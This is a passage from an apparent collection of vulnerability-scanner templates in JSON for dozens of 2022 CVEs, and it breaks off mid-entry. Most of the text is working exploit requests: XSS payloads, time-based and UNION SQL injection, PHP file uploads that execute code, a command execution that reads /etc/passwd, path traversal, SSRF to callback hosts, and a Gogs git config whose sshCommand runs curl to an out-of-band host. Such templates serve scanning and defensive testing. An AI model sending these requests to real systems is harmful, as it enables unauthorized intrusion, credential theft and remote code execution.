/wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://oast.me\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-48197","info":{"name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1'\"()&%<zzz><script>alert(document.domain)</script>","widget.TreeView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 15s\nGET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-45269","info":{"name":"Linx Sphere - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Component Based Setup"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41412","info":{"name":"perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1580","info":{"name":"Site Offline WP Plugin < 1.5.3 - Authorization Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["Site Offline Or Coming Soon Or Maintenance Mode"]}]},{"method":"GET","path":["{{BaseURL}}/?admin"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"wp-block\", \"author\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-38322","info":{"name":"Temenos Transact - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setupHelp('')\" onerror=\"confirm('document.domain')"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 